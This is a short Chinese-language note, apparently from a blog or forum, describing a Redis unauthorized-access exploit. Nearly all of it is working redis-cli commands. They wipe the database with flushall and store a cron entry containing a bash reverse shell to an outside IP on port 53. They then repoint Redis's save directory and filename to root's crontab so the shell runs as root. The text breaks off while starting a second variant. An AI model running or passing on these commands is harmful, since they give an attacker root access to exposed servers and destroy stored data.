redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面; 测试环境:CentOS,RHEL # 利用crontab反弹shell redis-cli flushall echo -e "nn*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1nn"|redis-cli -x set 1 redis-cli config set dir /var/spool/cron/ redis-cli config set dbfilename root redis-cli save # 利用crontab创建文件 /tmp/888 redis-cli flushall # 为了方便...